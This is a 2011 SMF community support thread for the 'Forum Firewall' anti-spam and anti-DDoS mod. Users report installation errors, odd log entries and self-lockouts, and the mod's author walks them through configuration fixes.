Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5|Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11|Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7|Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7

Just wondered as I can't seem to get it to work.
Title: Re: Forum Firewall
Post by: butchs on July 03, 2011, 10:42:38 AM
For members you should use permissions.  Then it will check the last used ip address when they are offline.  The UA whitelist can allow more than you want.

It is formatted as follows:
8J2 Safari|8A293 Safari|Mobile
:)
Title: Re: Forum Firewall
Post by: SD-X on July 03, 2011, 11:17:20 PM
I'm assuming since this mod is compatible with Stop Spammer and Bad Behavior, it should be, but is this also compatible with Mod httpBL?
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 04:52:09 AM
Mods are not written to be compatible with other mods.  They are written for a specific purpose.

With that said there are several people who use them together with no issues.
Title: Re: Forum Firewall
Post by: digit on July 04, 2011, 05:06:51 AM
Hey Butchs...  I just manually installed the mod and am running in test mode.... (also just tossed you a few coins ;-))  After 1 hour - I have 15 pages of logs under the Visitors tab.

I am waiting for my ISP to turn off Magic Quotes.... thanks for the heads up!

In my visitor log - under the IP column, I see a bunch of....

Keep-Alive

and...

[uScM]

What are those?

Thanks again, for what looks like an awesome mod!

digit
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 05:15:11 AM
Thank you.

Keep-alive is a bot trying to stay connected.

Not sure what [uScM] is?  It does not look like something good...

If you have a lot of mobile users you may not be able to use the "Review Proxy List" option.
:-X
Title: Re: Forum Firewall
Post by: digit on July 04, 2011, 05:16:41 AM
Sorry - but I failed to add my attachment (now it's there)

Please take a look.

Thanks again
Title: Re: Forum Firewall
Post by: SD-X on July 04, 2011, 06:01:29 AM
Apologies, when I mentioned that, I just meant it in terms of there being no known issues. For example, I know Bad Behavior isn't compatible with Mod httpBL because of the similar methods they use which conflict and could cause errors. :)
Title: Re: Forum Firewall
Post by: digit on July 04, 2011, 06:42:55 AM
Please take a look at the attachment - now I am seeing the word "close" under IP's as well as other non IP looking strings.

Any ideas?  SIGH.
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 09:54:38 AM
Quote from: SugarD-x on July 04, 2011, 06:01:29 AM
Bad Behavior isn't compatible with Mod httpBL because of the similar methods they use which conflict and could cause errors. :)

That is not true!  There is not a compatibility issue.  In fact, Bad Behavior is simply doings it's job.  The code for project honey pot in Bad Behavior is the same code successfully utilized by Bad Behavior in countless other platforms.  The project honey pot code in Mod httpBL is not the same as other platforms.  I tried to explain this to the mod Author several times but he prefers to spread a rumor.  This error is the reason I activated Bad Behavior's httpBL portion.

Unlike other ports of project honey pot, such as Dupal (http://drupal.org/project/httpbl), Mod httpBL lacks either a "die() (http://www.php.net/manual/en/function.die.php)" or "exit() (http://php.net/manual/en/function.exit.php)" in the warning page.  Mod httpBL loads before Bad Behavior in SMF source code and performs it's tests before Bad Behavior.   Some bots take advantage of the php script not being terminated by Mod httpBL and slip past the Mod httpBL warning page to get caught by Bad Behavior's warning page which resides later in SMF source code.  Bad Behavior then terminates the execution of php and further advancement in the code, because it's warning page contains "termination".

This is a serious omission in Mod httpBL which can allow your site to be vulnerable to hacking attempts.
:-X

Title: Re: Forum Firewall
Post by: SD-X on July 04, 2011, 10:09:17 AM
Quote from: butchs on July 04, 2011, 09:54:38 AM
Quote from: SugarD-x on July 04, 2011, 06:01:29 AM
Bad Behavior isn't compatible with Mod httpBL because of the similar methods they use which conflict and could cause errors. :)

That is not true!  There is not a compatibility issue.  In fact, Bad Behavior is simply doings it's job.  The code for project honey pot in Bad Behavior is the same code successfully utilized by Bad Behavior in countless other platforms.  The project honey pot code in Mod httpBL is not the same as other platforms.  I tried to explain this to the mod Author several times but he prefers to spread a rumor.  This error is the reason I activated Bad Behavior's httpBL portion.

Unlike other ports of project honey pot, such as Dupal (http://drupal.org/project/httpbl), Mod httpBL lacks either a "die() (http://www.php.net/manual/en/function.die.php)" or "exit() (http://php.net/manual/en/function.exit.php)" in the warning page.  Mod httpBL loads before Bad Behavior in SMF source code and performs it's tests before Bad Behavior.   Some bots take advantage of the php script not being terminated by Mod httpBL and slip past the Mod httpBL warning page to get caught by Bad Behavior's warning page which resides later in SMF source code.  Bad Behavior then terminates the execution of php and further advancement in the code, because it's warning page contains "termination".

This is a serious omission in Mod httpBL which can allow your site to be vulnerable to hacking attempts.
:-X
Why not contact the author and discuss fixing the issues so the mods can peacefully co-exist without risk or issue? (And I know you said you tried to tell him. What I'm suggesting is discussing it rather than pointing fingers. See if you both can come to a resolution happily. :) )
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 10:12:05 AM
Quote from: digit on July 04, 2011, 06:42:55 AM
Please take a look at the attachment - now I am seeing the word "close" under IP's as well as other non IP looking strings.

Sorry I went back to sleep then my internet went down.

The invalid ip's you show are in fact ip spoof attempts and should be blocked.

The only concern I see in your log are the DOS attempts.

If all the above is well then you have a spoofed Google.  Bad behavior will catch the poor spoof attempts but there are some evil bots out there who spoof Google un-detected.  Usually for DDOS attacks.  They do this because google is white listed by many sites.  I have been working on a new test that so far seems to stop this attack cold.  This will take me a little while to work out all the bugs though...
8)
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 10:18:11 AM
Quote from: SugarD-x on July 04, 2011, 10:09:17 AM
Why not contact the author and discuss fixing the issues so the mods can peacefully co-exist without risk or issue? (And I know you said you tried to tell him. What I'm suggesting is discussing it rather than pointing fingers. See if you both can come to a resolution happily. :) )

Please do not reprimand me when you do not have the history.  There is a discussion thread on his homepage that he will gladly point out to you.  I wasted enough time trying to explain things to him.
Title: Re: Forum Firewall
Post by: SD-X on July 04, 2011, 10:20:40 AM
Quote from: butchs on July 04, 2011, 10:18:11 AM
Quote from: SugarD-x on July 04, 2011, 10:09:17 AM
Why not contact the author and discuss fixing the issues so the mods can peacefully co-exist without risk or issue? (And I know you said you tried to tell him. What I'm suggesting is discussing it rather than pointing fingers. See if you both can come to a resolution happily. :) )

Please do not reprimand me when you do not have the history.  There is a discussion thread on his homepage that he will gladly point out to you.  I wasted enough time trying to explain things to him.
I'm just trying to help man. No worries. I want to see you both succeed. Modders need to unite against these evil spammers! :)
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 10:27:03 AM
We try...  It is an easy fix.  just add exit(); to the end of his warning page.  The line before ?>.

Quote from: butchs on July 04, 2011, 10:12:05 AM
The invalid ip's you show are in fact ip spoof attempts and should be blocked.

More information.  These invalid ip's are from poorly written bots or poorly written/ malicious proxies.
Title: Re: Forum Firewall
Post by: SD-X on July 04, 2011, 10:37:57 AM
Quote from: butchs on July 04, 2011, 10:27:03 AM
We try...  It is an easy fix.  just add exit(); to the end of his warning page.  The line before ?>.
Thank you! :)
Title: Re: Forum Firewall
Post by: digit on July 04, 2011, 10:41:44 AM
Quote from: butchs on July 04, 2011, 10:27:03 AM
We try...  It is an easy fix.  just add exit(); to the end of his warning page.  The line before ?>.

Quote from: butchs on July 04, 2011, 10:12:05 AM
The invalid ip's you show are in fact ip spoof attempts and should be blocked.

More information.  These invalid ip's are from poorly written bots or poorly written/ malicious proxies.

Thanks - one last post - for awhile - I hope  8)

See this attachment....

Are the 127.0.0.1 IP's anything to be concerned with?

Thanks again...  can't wait to start blocking!
Title: Re: Forum Firewall
Post by: SD-X on July 04, 2011, 10:43:20 AM
Quote from: digit on July 04, 2011, 10:41:44 AM
Quote from: butchs on July 04, 2011, 10:27:03 AM
We try...  It is an easy fix.  just add exit(); to the end of his warning page.  The line before ?>.

Quote from: butchs on July 04, 2011, 10:12:05 AM
The invalid ip's you show are in fact ip spoof attempts and should be blocked.

More information.  These invalid ip's are from poorly written bots or poorly written/ malicious proxies.

Thanks - one last post - for awhile - I hope  8)

See this attachment....

Are the 127.0.0.1 IP's anything to be concerned with?

Thanks again...  can't wait to start blocking!
I get those in httpBL too. I think they are just bots using very sneaky methods to connect to the forum. ;)
Title: Re: Forum Firewall
Post by: digit on July 04, 2011, 11:32:29 AM
YOH NO!

What is THIS entry?

(see attachment)
Title: Re: Forum Firewall
Post by: SD-X on July 04, 2011, 11:49:13 AM
Quote from: digit on July 04, 2011, 11:32:29 AM
YOH NO!

What is THIS entry?

(see attachment)
Wow, that almost looks like the output of a page put into a URL. I can't confirm this, but I'm guessing a bot tried way too hard to bypass your anti-spam software and failed horribly. :D
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 11:52:28 AM
Quote from: digit on July 04, 2011, 10:41:44 AM
Are the 127.0.0.1 IP's anything to be concerned with?

Oh yea.  It is something you want to block.  That trick will not work with FF!  Just check out who posted the 1st post ever in your forum.  [nofollow] http://www.tech-faq.com/127-0-0-1.html [/nofollow]
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 11:53:53 AM
Quote from: digit on July 04, 2011, 11:32:29 AM
YOH NO!

What is THIS entry?

(see attachment)

A hack attempt.  The bot is using a dictionary "old school crack" type of program to try to get your members passwords.

You should enable blocking.

Please copy and paste the code and PM it to me.
Title: Re: Forum Firewall
Post by: butchs on July 04, 2011, 12:19:30 PM
WRT Google bot spoofing.  Here is a snippet of the next revision, in a month or so...

Can't tell you how I did it...  But...  The first post is my bandwidth showing the DDOS attack.  The second post is my test FF log blocking the attack.  Look at all those good bots being spoofed!  As you can see the attacker gave up last night!

O:)
Title: Re: Forum Firewall
Post by: Apllicmz on July 16, 2011, 01:45:23 PM
Yes thank you for Update
good work

Title: Re: Forum Firewall
Post by: butchs on July 16, 2011, 01:46:15 PM
You are welcome...   8)

New version:

DDOS HELP

The new DDOS test is awesome and stops the good bot spoofers cold in their tracks.  This test is the first of it's kind anywhere...  I hope you enjoy the reduced bandwidth!  O:)

This is how you can use the new test.  You need to properly set-up your robots.txt file for a SMF forum.  Here are the recommended steps:

Within 24hrs Google should search your site.  Once you have been searched install the mod.

The mod will then try to read your robots.txt file and self configure.  Enable the test and say goodbye to the DDOS spoofers!
:)

Assuming you never had a robots.txt file installed when you loaded the mod you do the following:
  To have the mod check you will uninstall the mod in Package Manager.  Then re-install the mod.
  During the re-install the self configure script will look for your robots.txt file.  If found and is
  properly formatted, the once empty "Robots.txt action's" field will be populated.

  Please note that when the mod is un-installed it disables it's self.  You will have to re-enable the
  mod for it to work.

  The mod will NOT do anything if there is any text in the "Robots.txt action's" field during
  installation.  If there is any data in the "Robots.txt action's" field, you must delete all data and
  save the empty field before re-installing the mod.

Any changes made to the robots.txt file after mod installation will require manually editing the "Robots.txt action's" field.

The mod does it's best to guess your configuration.  I am sure, there are some servers where the self configure will not work.  In those cases you will have to enter all the data manually.
Title: Re: Forum Firewall
Post by: MrAlicard on July 16, 2011, 08:58:37 PM
The database value you're trying to insert does not exist: value

Why? :o
The previous version 1.1.0 uninstall and new version the 1.1.2 install I this installation get.
Title: Re: Forum Firewall
Post by: Bancherd on July 17, 2011, 02:41:49 AM
Quote from: MrAlicard on July 16, 2011, 08:58:37 PM
The database value you're trying to insert does not exist: value

Why? :o
The previous version 1.1.0 uninstall and new version the 1.1.2 install I this installation get.

I got same problem.  Installed on one forum without any problem, but this error showed up while trying to install on another forum.  Both forums were using 1.1.1 without any problem.
Title: Re: Forum Firewall
Post by: MrAlicard on July 17, 2011, 05:58:11 AM
Quote from: Bancherd on July 17, 2011, 02:41:49 AM
Quote from: MrAlicard on July 16, 2011, 08:58:37 PM
The database value you're trying to insert does not exist: value

Why? :o
The previous version 1.1.0 uninstall and new version the 1.1.2 install I this installation get.

I got same problem.  Installed on one forum without any problem, but this error showed up while trying to install on another forum.  Both forums were using 1.1.1 without any problem.

And where you can download the 1.1.1 Firewall?
1.1.2 because it is everywhere.
Thanks in advance for your help. :)
Title: Re: Forum Firewall
Post by: butchs on July 17, 2011, 06:02:45 AM
I saw that before while testing and then I deleted and re-downloaded the mod and it installed the second time with no error.

Please let me know if re-downloading and installing the 1.1.2 mod does the trick?

Title: Re: Forum Firewall
Post by: butchs on July 17, 2011, 06:29:44 AM
I noticed this SMF bug and will work on it:  http://dev.simplemachines.org/mantis/view.php?id=2196 (http://dev.simplemachines.org/mantis/view.php?id=2196)
Title: Re: Forum Firewall
Post by: MrAlicard on July 17, 2011, 06:50:02 AM
does not work  :( .
I downloaded the 1.1.1 version and after installed, the installation went normally.
Then I wanted to install the 1.1.2 version but the same error.
Title: Re: Forum Firewall
Post by: butchs on July 17, 2011, 06:56:23 AM
Does the attached work?


(attachment deleted because it worked and now is in the mod section)
Title: Re: Forum Firewall
Post by: MrAlicard on July 17, 2011, 07:13:52 AM
Quote from: butchs on July 17, 2011, 06:56:23 AM
Does the attached work?

WoW Thank You the install perfect work. :)
Thank You very much. :D
Title: Re: Forum Firewall
Post by: butchs on July 17, 2011, 07:14:52 AM
Thank you...  The update with the SMF 2.0 bug fix is posted.
O:)
Title: Re: Forum Firewall
Post by: Bancherd on July 17, 2011, 08:49:27 AM
Thank you, 1.1.3 installed without any problems.  :D
Title: Re: Forum Firewall
Post by: digit on July 17, 2011, 09:10:13 AM
butchs, to upgrade - do I just copy files over?  (or were there also changes to the database/templates?)

Thanks
Title: Re: Forum Firewall
Post by: butchs on July 17, 2011, 10:14:13 AM
Besides copying files over files there were changes in the modsettings database.

You should be able to go to the admin page and manually enter the data there instead of having to have to reinstall.
  Copy the Robots to be tested from install_db.
  Then manually enter the action's from your robots file as explained in the help.
  Hit save and the information should load into the database.
:)
Title: Re: Forum Firewall
Post by: aquascape on July 19, 2011, 11:09:42 PM
Is it compatible with 2.0RCS or gold??
Title: Re: Forum Firewall
Post by: butchs on July 20, 2011, 04:55:29 AM
Yes.  FYI - Compatibly of all mods are listed with each mod submission.
Title: Re: Forum Firewall
Post by: stratocaster on July 21, 2011, 09:54:21 AM
Hi butchs, first thank you for your job in this mod.

I have error's after install 1.1.3

2: array_intersect() [<a href='function.array-intersect'>function.array-intersect</a>]: Argument #2 is not an array

.../public_html/Sources/Security.php
Line: 828


2: in_array() [<a href='function.in-array'>function.in-array</a>]: Wrong datatype for second argument

.../public_html/Sources/Security.php
Line: 825



2: array_diff() [<a href='function.array-diff'>function.array-diff</a>]: Argument #2 is not an array

/public_html/Sources/Load.php
Line: 934



8: Undefined variable: removals

/public_html/Sources/Load.php
Line: 934


I do not know if it's only a problem on my forum, since nobody complained of the same issue or other, but the truth is that with the previous version (1.1.1), the forum did not have these errors.

I use SMF 2.0
mods:
1.    Spoiler Tag    0.7.2
2.    Hide Tag Special    3.0
3.    SimplePortal    2.3.3
4.    Treasury    2.10
5.    SimplePortal - ("language file")    2.3.3
6.    Country Flags    1.1.2
7.    [BBCode] Blink    1.0
8.    Topic Solved    1.1.1
9.    Posting_Announcement
10.    Thank-O-Matic    2.0 RC4
11.    Member Color Link    3.0.8
12.    Aeva ~ Auto-Embed Video & Audio    7.1
13.    Forum Firewall    1.1.3 (not instaled)
14.    SMF Topic Prefix Mod    1.1
15.    Related Topics    1.4 RC1


I leave the two files attached (without de Firewall mod instaled):

Load.php
Security.php

Sorry for my bad english, I hope you can understand my message.

Thank you.
Title: Re: Forum Firewall
Post by: butchs on July 21, 2011, 06:18:48 PM
Version 1.1.3 of the mod does not edit "Security.php" or "Load.php" so those files are the same as the files you had before the mod was installed.  Try turning on eval.  Chances are the errors are bots looking for weaknesses or trying to hack.

Look at the line above (that you omitted) the error "http://www....action-bla...bla"  chances are it is something SMF does not agree with.
Title: Re: Forum Firewall
Post by: stratocaster on July 22, 2011, 02:01:14 AM
Thanks for the reply.


I turnning on de eval, but errors are presented in the same way


http://forum_name/index.php?topic=2514.msg%msg_id%
2: in_array() [<a href='function.in-array'>function.in-array</a>]: Wrong datatype for second argument
File: /home/user_name/public_html/Sources/Security.php
Line: 825


http://forum_name/index.php?topic=2514.msg%msg_id%
2: array_intersect() [<a href='function.array-intersect'>function.array-intersect</a>]: Argument #2 is not an array
File: /home/user_name/public_html/Sources/Security.php
Line: 828


http://forum_name/index.php?topic=2549.0;prev_next=prev
8: Undefined variable: removals
File: /home/user_name/public_html/Sources/Load.php
Line: 934


I reinstalled 1.1.3 without problems, but when I enable the "Enable Testing", I still have the same errors.
when I have version 1.1.1 installed, these errors do not occur.

I do not know what procedures I need to do to solve this.

Thank you.
Title: Re: Forum Firewall
Post by: butchs on July 22, 2011, 05:03:56 AM
The first one peaks my interest:
Quotehttp://forum_name/index.php?topic=2514.msg%msg_id%

Humm...  %msg_id% looks like something suspicious.  I am going to look into this activity.

Quote from: stratocaster on July 22, 2011, 02:01:14 AM
I do not know what procedures I need to do to solve this.

They are SMF errors due to bad bots.  You can report the errors to SMF.  They are not related to the mod.

Title: Re: Forum Firewall
Post by: butchs on July 22, 2011, 05:46:46 PM
Here is info on %msg_id% (http://www.simplemachines.org/community/index.php?topic=356850.0).
Title: Re: Forum Firewall
Post by: stratocaster on July 22, 2011, 11:20:41 PM
Quote from: butchs on July 22, 2011, 05:46:46 PM
Here is info on %msg_id% (http://www.simplemachines.org/community/index.php?topic=356850.0).


Ok butchs, Thank you.
Title: Re: Forum Firewall
Post by: justjim on July 24, 2011, 08:23:22 AM
I'm receiving this error in the Forum Error log

2: strpos() [<a href='function.strpos'>function.strpos</a>]: Empty delimiter

..../Sources/ForumFirewall.php
Line: 202


What should l look for?

Thanks
Title: Re: Forum Firewall
Post by: butchs on July 24, 2011, 11:24:31 AM
First off you should upgraded to the latest version, you are using version 1.1.1 or older.

Second your
QuoteInjection List
is either empty or it contains || which should be single |.
8)
Title: Re: Forum Firewall
Post by: justjim on July 24, 2011, 01:29:41 PM
Quote from: butchs on July 24, 2011, 11:24:31 AM
First off you should upgraded to the latest version, you are using version 1.1.1 or older.

Second your
QuoteInjection List
is either empty or it contains || which should be single |.
8)
Thank you. I'll re-load and re-check.
Title: Re: Forum Firewall
Post by: Xarcell on July 24, 2011, 03:48:29 PM
Can forum firewall be used to stop spammers who manually register and spam my forums? If so, how?

I'm spending a 1/2 hour a day per site deleting spam. I keep banning people, but it just doesn't stop.
Title: Re: Forum Firewall
Post by: butchs on July 24, 2011, 04:14:35 PM
If there is a pattern to what they are doing they can be blocked.  You will need to look at your forum log.  You can PM me parts if you like...

Otherwise bad behavior with project honeypot enabled and/or stop forum spam can assist.

For some reason they have been aggressive the past few weeks.  Bad behavior has blocked over 1,000 spammers from my site this week.  Previously I averaged 300 blocks a week.


Title: Re: Forum Firewall
Post by: busterone on July 24, 2011, 07:09:19 PM
Indeed, the spammers have gotten extremely aggressive lately.  The little robo-roaches have been on steroids.  :)
Title: Re: Forum Firewall
Post by: butchs on July 24, 2011, 08:17:36 PM
They were killing me earlier this month.  Not anymore...  I believe they are getting desperate!
O:)
Title: Re: Forum Firewall
Post by: Alex' Manson on July 25, 2011, 04:35:16 AM
there is a mistake in the english language, in the enable robots.txt validation, press the help button, you will see that it says robots.tst inside it.
Title: Re: Forum Firewall
Post by: MiY4Gi on July 25, 2011, 04:12:16 PM
What would work best for harvester bots? Spammers aren't that big a deal, but I can't have bots killing my server. I see it says that Forum Firewall can prevent DDOS attacks. How does it do this? What about bots that "browse" my forum at light speed? Can I slow them down somehow?
Title: Re: Forum Firewall
Post by: butchs on July 25, 2011, 06:09:36 PM
Quote from: Sisko Punk on July 25, 2011, 04:35:16 AM
there is a mistake in the english language, in the enable robots.txt validation, press the help button, you will see that it says robots.tst inside it.

I am sure there are more.   :o
Title: Re: Forum Firewall
Post by: butchs on July 25, 2011, 06:22:22 PM
Quote from: MiY4Gi on July 25, 2011, 04:12:16 PM
What would work best for harvester bots? Spammers aren't that big a deal, but I can't have bots killing my server.

I designed this mod to get the bots that Bad Behavior (http://custom.simplemachines.org/mods/index.php?mod=2502) was not getting.  It is designed to complement BB mod...  The ones that suck up bandwidth and/or try to hack your site.

Quote from: MiY4Gi on July 25, 2011, 04:12:16 PM
I see it says that Forum Firewall can prevent DDOS attacks. How does it do this?

I can not tell you how I do it in an open forum, otherwise the bad guys will work-around-it but, please set-up your robots.txt as described in this post (http://www.simplemachines.org/community/index.php?topic=417490.msg3111015#msg3111015).

Quote from: MiY4Gi on July 25, 2011, 04:12:16 PM
What about bots that "browse" my forum at light speed? Can I slow them down somehow?

Yes.  Make sure you have the "Crawl-delay:" set in robots.txt and google webmasters (http://www.google.com/support/webmasters/).  Then set your "DOS Attack",  "Trigger" and "Longterm Ban".  You can set the "Longterm Ban" to never for starters.  If they are persistent you can increase it.  The bots will retaliate by hitting your site hard for a week or two and then give up.

Your regular members with multiple posts should be added to the Whitelist Membergroup Permission.
8)
Title: Re: Forum Firewall
Post by: justjim on July 25, 2011, 08:27:09 PM
Thanks butchs for a great mod.  :)
Title: Re: Forum Firewall
Post by: digit on July 26, 2011, 08:56:27 AM
Quote from: butchs on July 17, 2011, 10:14:13 AM
Besides copying files over files there were changes in the modsettings database.

You should be able to go to the admin page and manually enter the data there instead of having to have to reinstall.
  Copy the Robots to be tested from install_db.
  Then manually enter the action's from your robots file as explained in the help.
  Hit save and the information should load into the database.
:)

Thanks Butchs,

Well, I went through the manual upgrade...  then enabled it and as soon as I submitted the settings, I got a white screen, killing the forum.  I removed the include in the index.php file (figured it was the fastest way to restore the forum) and voila it came back.

Looked in my error logs, and had a bunch of these...

Undefined index: possibly_robot
File: /users/Sources/Subs-ForumFirewall.php
Line: 205

Any ideas?

Thanks.
digit
Title: Re: Forum Firewall
Post by: butchs on July 26, 2011, 05:51:17 PM
That is because your are using the "Subs-ForumFirewall.php" for SMF 2.0.x.  If you unzip the mod and look in the "1x" folder you will find the correct "Subs-ForumFirewall.php" for SMF 1.1.x.  Grab the others while you are there...
O:)
Title: Re: Forum Firewall
Post by: digit on July 26, 2011, 06:08:30 PM
Thanks, did that, (must have copied over the 2x files after I DID copy over the 1x files!)

Now I am getting... 

HTTP Error 403 Forbidden

You don't have permission to access

/ on this server.

Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Invalid ip!

If you get this message in error, please contact the ADM1N and provide the date and time of this message.


I added my current IP address and this still appears.

My log shows...  Invalid Admin IP: XX.XX.XXX! (x-ed out by me)

Sorry for the pain.

Thanks. (I can delete these messages after we get through this..)
Title: Re: Forum Firewall
Post by: butchs on July 26, 2011, 06:30:33 PM
You must have the wrong ip range in your bypass protection settings.  Read this post (http://www.simplemachines.org/community/index.php?topic=417490.msg2930255;topicseen#msg2930255).
:'(
Title: Re: Forum Firewall
Post by: Alex' Manson on July 26, 2011, 08:18:22 PM
is this normal:
GET /welcome-messages/welcome-adam-!/ HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)   Hack: Disallowed characters!

?
Title: Re: Forum Firewall
Post by: butchs on July 26, 2011, 08:26:48 PM
You may want to add "!" to your "Permitted URI Characters" since you like !.  Try something like "a-z 0-9~%$,.:;&#!?/+=_\-".  Humm... You may have to adjust.  I am not the best with regular expressions...
:-X
Title: Re: Forum Firewall
Post by: Alex' Manson on July 26, 2011, 11:53:43 PM
added it, will see how ti goes.
Title: Re: Forum Firewall
Post by: digit on July 28, 2011, 04:49:37 AM
Hi again Butchs,

Well, I have the firewall installed ...  but I see one entry in the log with the IP listed as "Keep-Alive"...  that was banned for a DOS attack.

However, that ban has no triggers...  so it seems pretty useless!

I would hate to have a lot of useless bans to delete!

What can be done about that.

Thanks again,
digit
Title: Re: Forum Firewall
Post by: butchs on July 28, 2011, 05:26:05 AM
About all you can do is turn ban to never and let it block for the cache duration. 
Title: Re: Forum Firewall
Post by: digit on July 28, 2011, 05:53:33 AM
Thanks...   in reference to DOS attacks...   what happens if a post has 20 images?

Will all those requests be considered as one?
Title: Re: Forum Firewall
Post by: Ilkharnos on July 28, 2011, 10:44:44 AM
Hello,

My site was attacked and it became useless. Thank god I had made a backup so I managed to restore it. For a better protection, I started to use this mod. I'm not good at security and coding business, so I checked the tick boxes of some options (safe ones, which I don't completely understand what they do) and enabled the mod. Then I got this:

SECURITY RISK: MAGIC_QUOTES ARE ON!

Can you tell me how I can use this mod effectively and how to overcome this problem?

Thank you for your assistance.

Regards.
Title: Re: Forum Firewall
Post by: Tony Reid on July 28, 2011, 10:48:19 AM
Ask your host to disable it... alternatively stick this line in .htaccess

php_flag magic_quotes_gpc Off

Title: Re: Forum Firewall
Post by: butchs on July 28, 2011, 06:12:16 PM
Quote from: digit on July 28, 2011, 05:53:33 AM
Thanks...   in reference to DOS attacks...   what happens if a post has 20 images?

Will all those requests be considered as one?

20 images?  Why so many in one post?  Not sure...  Maybe if your dos setting is too low.
Title: Re: Forum Firewall
Post by: digit on July 28, 2011, 06:42:04 PM
Quote from: butchs on July 28, 2011, 06:12:16 PM
Quote from: digit on July 28, 2011, 05:53:33 AM
Thanks...   in reference to DOS attacks...   what happens if a post has 20 images?

Will all those requests be considered as one?

20 images?  Why so many in one post?  Not sure...  Maybe if your dos setting is too low.

Well, every site is different - I was just wondering if images embedded within posts are counted as hits... could be an issue....   possibly for me...    I think I have a limit of 10 images per post - of which - maybe 1% of my posts contain that many - just hate to be banning people for browsing.



Title: Re: Forum Firewall
Post by: butchs on July 28, 2011, 08:08:28 PM
Not sure but you can test by logging in as a regular member and posting 10 images.
Title: Re: Forum Firewall
Post by: bruce86 on July 30, 2011, 08:40:21 PM
Help me!!
http://www.passiongames.it/forum/index.php
:'(
Title: Re: Forum Firewall
Post by: Alex' Manson on July 30, 2011, 11:57:34 PM
Quote from: bruce86 on July 30, 2011, 08:40:21 PM
Help me!!
http://www.passiongames.it/forum/index.php
:'(

the bypass settings were messed up, i was blocked too for bypass attempt ! 403.
Title: Re: Forum Firewall
Post by: butchs on July 31, 2011, 07:48:01 AM
BYPASS PROTECTION HELP

If you made an error read this post (http://www.simplemachines.org/community/index.php?topic=417490.msg2930255;topicseen#msg2930255) to correct access.

There are three settings to adjust.
The modification will install some default setting but they will need to be adjusted before enabling.  We will set up an example address.  The ip address will be ""67.195.112.83".

First you will want to do a whois (http://network-tools.com/) on the address.

QuoteNetwork
NetRange   67.195.0.0 - 67.195.255.255
CIDR   67.195.0.0/16
Name   A-YAHOO-US8
Handle   NET-67-195-0-0-1
Parent   NET67 (NET-67-0-0-0-0)
Net Type   Direct Allocation
Origin AS   
Nameservers   NS2.YAHOO.COM
NS1.YAHOO.COM
NS5.YAHOO.COM
NS4.YAHOO.COM
NS3.YAHOO.COM

The IP low and High is the beginning and end of the netrange where your ip can be located.

Here I choose:
Admin IP Low can be  "67.195.0.4"
Admin IP High can be "67.195.255.254"

Why did the "Admin IP Low" start at x.x.x.4?
Admin IP High end at x.x.x.254?
You should narrow it down further the only be the range of ip addresses you will access the forum.  If you have a fixed ip address then both low and high are the same.

If you check your DNS record (http://network-tools.com/) for the same ip you will get:
QuoteRetrieving DNS records for b3091163.crawl.yahoo.net...
DNS servers
ns3.yahoo.com
ns4.yahoo.com
ns1.yahoo.com
ns5.yahoo.com
ns2.yahoo.com

Answer records
b3091163.crawl.yahoo.net      A   67.195.112.83   7200s

Authority records
crawl.yahoo.net      NS   ns3.yahoo.com   172800s
crawl.yahoo.net      NS   ns5.yahoo.com   172800s
crawl.yahoo.net      NS   ns2.yahoo.com   172800s
crawl.yahoo.net      NS   ns4.yahoo.com   172800s
crawl.yahoo.net      NS   ns1.yahoo.com   172800s

The "Admin Domain Name" is a shortened version of the "A or Answer record".

You want to take part of the right end of this record.  The part that does not change.  Usually after a dash or before a weird number.  Too much and/or too little can be an problem.  In this example I would use "crawl.yahoo.net" as the "Admin Domain Name".
:)
Title: Re: Forum Firewall
Post by: bruce86 on July 31, 2011, 08:25:47 AM
I can not find phpmyadmin. :-\
Title: Re: Forum Firewall
Post by: butchs on July 31, 2011, 08:28:54 AM
You need to log in your hosts cpanel.  If you do to know what I am talking about contact your host.
Title: Re: Forum Firewall
Post by: bruce86 on July 31, 2011, 08:31:03 AM
Why do this?
Title: Re: Forum Firewall
Post by: butchs on July 31, 2011, 08:39:37 AM
I am trying to help you.  Yet you have taken a full circle.   :o

You blocked yourself because you did not follow instructions.  I have said many times do not enable the mod until after a few days and you are sure you are not going to block yourself.  You need to disable the mod and fix the settings before enabling it again.  If you have admin access simply uninstall and reinstall the mod.  But if you do not then you have to do it via phpmyadmin.

Read the post (http://www.simplemachines.org/community/index.php?topic=417490.msg2930255;topicseen#msg2930255) for how to do that.  Local host support is beyond my abilities.  Contact your host for how to access phpmyadmin.
Title: Re: Forum Firewall
Post by: bruce86 on July 31, 2011, 08:43:25 AM
Ah ok..:) Thank you!..;)
Title: Re: Forum Firewall
Post by: butchs on July 31, 2011, 11:35:29 AM
You're welcome.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 05, 2011, 05:12:09 PM
What does the setting "Robots.txt action's" do?

What I want is to block any bots/crawlers that disobey my robots.txt file. Does this setting do that?

Also, is it possible to add an option in the firewall to block any users that browse too quickly or use excessive traffic in a short time?
Title: Re: Forum Firewall
Post by: butchs on August 05, 2011, 08:08:27 PM
Quote from: MiY4Gi on August 05, 2011, 05:12:09 PM
What does the setting "Robots.txt action's" do?

What I want is to block any bots/crawlers that disobey my robots.txt file. Does this setting do that?

It is easy to spoof an ip.  If your properly set the robots file and test it at the google webmasters site, the good bots will follow it.  The bad ip spoofed bots will not and get blocked.  This options stopped a nasty ddos attack on my site.

